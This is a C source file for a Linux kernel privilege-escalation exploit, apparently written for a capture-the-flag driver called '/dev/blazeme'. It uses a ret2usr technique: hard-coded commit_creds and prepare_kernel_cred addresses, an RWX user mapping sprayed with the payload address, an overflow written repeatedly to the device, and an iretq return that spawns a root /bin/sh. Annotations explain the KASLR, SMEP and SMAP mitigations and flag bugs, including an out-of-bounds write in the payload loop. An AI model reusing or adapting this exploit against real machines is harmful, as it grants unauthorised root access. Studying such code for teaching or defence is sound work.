#include <unistd.h> | |
#include <fcntl.h> | |
#include <stdint.h> | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <sys/mman.h> | |
/*
 * Kernel function pointers initialised from hard-coded addresses for one
 * specific kernel build. Initialising a pointer from an integer literal
 * without a cast is a constraint violation that compilers usually only warn
 * about. The values are layout-specific: any kernel that randomises its text
 * (KASLR) or was simply built differently will not have these symbols here,
 * which is why hard-coded symbol addresses are the first thing KASLR breaks.
 *
 * regparm(3) is an i386 calling-convention attribute; on x86-64 (implied by
 * the swapgs/iretq sequence in trap_return() below) it is expected to have no
 * effect -- TODO confirm with the toolchain used.
 */
int __attribute__((regparm(3))) (*commit_creds)(unsigned long cred) = 0xffffffff81063960;
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred) = 0xffffffff81063b50;
/* Defined below; leaves kernel mode through a hand-built iretq frame. */
void trap_return();
/*
 * Payload that runs in kernel context once control flow has been hijacked
 * (see main()). Calls commit_creds(prepare_kernel_cred(0)) through the
 * hard-coded pointers above and then hands control back to user mode via
 * trap_return(), which never returns here.
 * This is the textbook ret2usr shape: the kernel executes a function that
 * lives in a user mapping. SMEP exists precisely to fault on that jump, and
 * the code here assumes it is absent.
 */
void escalate_privs() {
    commit_creds(prepare_kernel_cred(0));
    trap_return();
}
/* User-mode CS, SS, RFLAGS and RSP captured by save_segments() and replayed by
 * trap_return() to build a consistent iretq frame. */
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
unsigned long saved_sp;
/* Defined below; the user-mode function that trap_return()'s iretq lands in. */
void shell();
/*
 * Snapshot the current user-mode CS, SS, RFLAGS and RSP into the globals
 * above so that trap_return() can later return to a consistent user state.
 * The "memory" clobber is there because the asm's outputs are globals.
 * Note that saved_sp is the RSP value inside this function's own frame
 * (pushq %rsp pushes the pre-push value), i.e. stack space that is dead once
 * this function returns; shell() is later started on exactly that stack.
 */
void save_segments() {
    asm volatile(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        "pushq %%rsp\n"
        "popq %3\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(saved_sp)
        :
        : "memory");
}
/*
 * Leave kernel mode without going through the kernel's own exit path.
 * After swapgs restores the user GS base, a five-slot iretq frame is written
 * at the current RSP and consumed by iretq:
 *   [rsp+0x00] RIP    = shell
 *   [rsp+0x08] CS     = user_cs
 *   [rsp+0x10] RFLAGS = user_rflags
 *   [rsp+0x18] RSP    = saved_sp
 *   [rsp+0x20] SS     = user_ss
 * Whatever the kernel stack held in those 40 bytes (depending on the
 * prologue, this function's saved frame pointer and return address) is
 * overwritten, which is why control never comes back to escalate_privs().
 * The asm stores to memory but declares no "memory" clobber; since iretq
 * leaves the function anyway the practical impact is probably nil.
 * On a hardened kernel this path is cut off earlier: SMEP faults when the
 * kernel jumps into escalate_privs() in user memory, and SMAP faults on the
 * kernel using the user-mapped page as its stack.
 */
void trap_return() {
    asm volatile(
        "swapgs ;"
        "movq %0, 0x20(%%rsp)\t\n"
        "movq %1, 0x18(%%rsp)\t\n"
        "movq %2, 0x10(%%rsp)\t\n"
        "movq %3, 0x08(%%rsp)\t\n"
        "movq %4, 0x00(%%rsp)\t\n"
        "iretq"
        :
        : "r"(user_ss), "r"(saved_sp), "r"(user_rflags), "r"(user_cs), "r"(shell));
}
/* User-mode landing pad reached through trap_return()'s iretq frame.
 * Prints a marker line, then replaces the session with an interactive
 * /bin/sh that inherits whatever credentials the process now holds. */
void shell() {
    puts("Starting shell");
    system("/bin/sh");
}
/*
 * Entry point. Builds a 64-byte payload, maps a user RWX region sprayed with
 * the address of escalate_privs(), records the user-mode segment state and
 * then writes the payload to the vulnerable device 100 times.
 * Returns -1 if the device cannot be opened or the mmap fails; otherwise falls
 * off the end (implicit 0 since C99). The fd is never closed and the write()
 * return values are never checked -- tolerable in a one-shot PoC, but a
 * reviewer would flag both.
 */
int main() {
    int fd;
    /* Target device node; everything below assumes this driver's specific
     * overflow and this kernel's specific layout. */
    fd = open("/dev/blazeme", O_RDWR);
    if (fd < 0) {
        return -1;
    }
    /* BUF_SIZE is a const-qualified variable, not an integer constant
     * expression, so payload is technically a VLA. Harmless here. */
    const size_t BUF_SIZE = 64;
    uint8_t payload[BUF_SIZE];
    payload[0] = 0x42;
    payload[1] = 0x42;
    /* 8-byte values are stored starting at payload[2], which is not 8-byte
     * aligned: a misaligned access through a cast pointer (UB in ISO C,
     * tolerated by x86). The original "'Hello ' prefix" comment did not match
     * the two 0x42 bytes actually written -- presumably stale. */
    uint64_t* ptr = (uint64_t*)&payload[2];
    size_t idx = 2;
    /* Original author's note: mmap at a fixed, non-alphanumeric address. Why
     * this particular value matters is not visible in this file. */
    const size_t MAP_SIZE = 0x2000;
    /* Two pages are mapped so that stack-pointer adjustments after the pivot
     * still hit mapped memory (original author's reasoning). The region is
     * RWX and filled with &escalate_privs below, i.e. user memory the kernel
     * will later use as both its stack and its code -- exactly what SMAP and
     * SMEP are designed to fault on. */
    void* addr = mmap((void*)0x173f000, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_FIXED | MAP_ANON | MAP_PRIVATE , -1, 0);
    if (addr == MAP_FAILED) {
        printf("map failed\n");
        return -1;
    }
    for (size_t i = 0; i < (MAP_SIZE / sizeof(unsigned long)); ++i) {
        ((unsigned long*)addr)[i] = (unsigned long)&escalate_privs;
    }
    printf("Addr mapped is %p\n", addr);
    /* Fill the rest of the payload with one repeated kernel address --
     * presumably the pivot gadget referred to above; cannot tell from here.
     * NOTE(review): idx takes the values 2, 10, ..., 58, and the final
     * iteration stores 8 bytes at payload[58..65], two bytes past the end of
     * the 64-byte array (an overflow of this program's own stack frame). idx
     * finishes at 66, so the 0x41 fill loop below never executes. */
    for (; idx < BUF_SIZE;) {
        *ptr = 0xffffffff8109c604;
        ptr++;
        idx += 8;
    }
    for (; idx < BUF_SIZE; ++idx) {
        payload[idx] = 0x41;
    }
    /* Original author's note: the driver's stack buffer is 512 bytes, so the
     * payload is sent repeatedly until the overwrite lines up with the
     * sprayed region. Not verifiable from this file. */
    printf("Saving segments\n");
    save_segments();
    printf("Sending payload, attempting to return to %p\n", &escalate_privs);
    for (size_t i = 0; i < 100; ++i) {
        write(fd, payload, sizeof(payload));
    }
}